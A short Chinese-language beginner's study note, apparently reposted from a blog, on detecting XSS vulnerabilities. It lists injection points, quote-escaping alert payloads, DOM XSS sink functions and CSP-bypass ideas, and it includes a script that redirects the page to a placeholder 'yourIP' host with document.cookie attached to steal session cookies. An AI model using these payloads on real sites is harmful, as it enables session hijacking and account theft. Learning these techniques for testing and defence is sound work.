其他分享
首页 > 其他分享> > xss漏洞探测payload

xss漏洞探测payload

作者:互联网

小白学习安全的知识笔记,还望大佬轻喷,多多帮助和指教

1、各种输入的点,名称、上传、留言、可交互的地方、选择列表,一切输入都是有害原则。

2、在URL或表单中提交的参数值在页面中有显示,很可能存在xss

XSS备忘单 https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

常用

js方法

       '  单引号 跳出前一个js

       ';alert(1)//

       \\';alert(1)// 当单引号被转义时

        有引号处理文字时 如:var input='payload';

盗取cookie

      <script>

      document.location = 'https://yourIP?cookie='+document.cookie

      </script>

 

DOM XSS常出现位置函数:

      document.write、location.search、eval()、location、

      someDOMElement.innerHTML/uterHTML/insertAdjacentHTML/onevent、

沙箱逃逸

绕过CSP

      1、悬空标记注入,指定url地址后面用?跟参数

      2、修改响应包中CSP指令,覆盖现有规则script-src等

(持续学习补充中。。。。)

 

标签:xss,alert,漏洞,cookie,location,constructor,document,payload,apos
来源: https://blog.csdn.net/weixin_45970226/article/details/117790388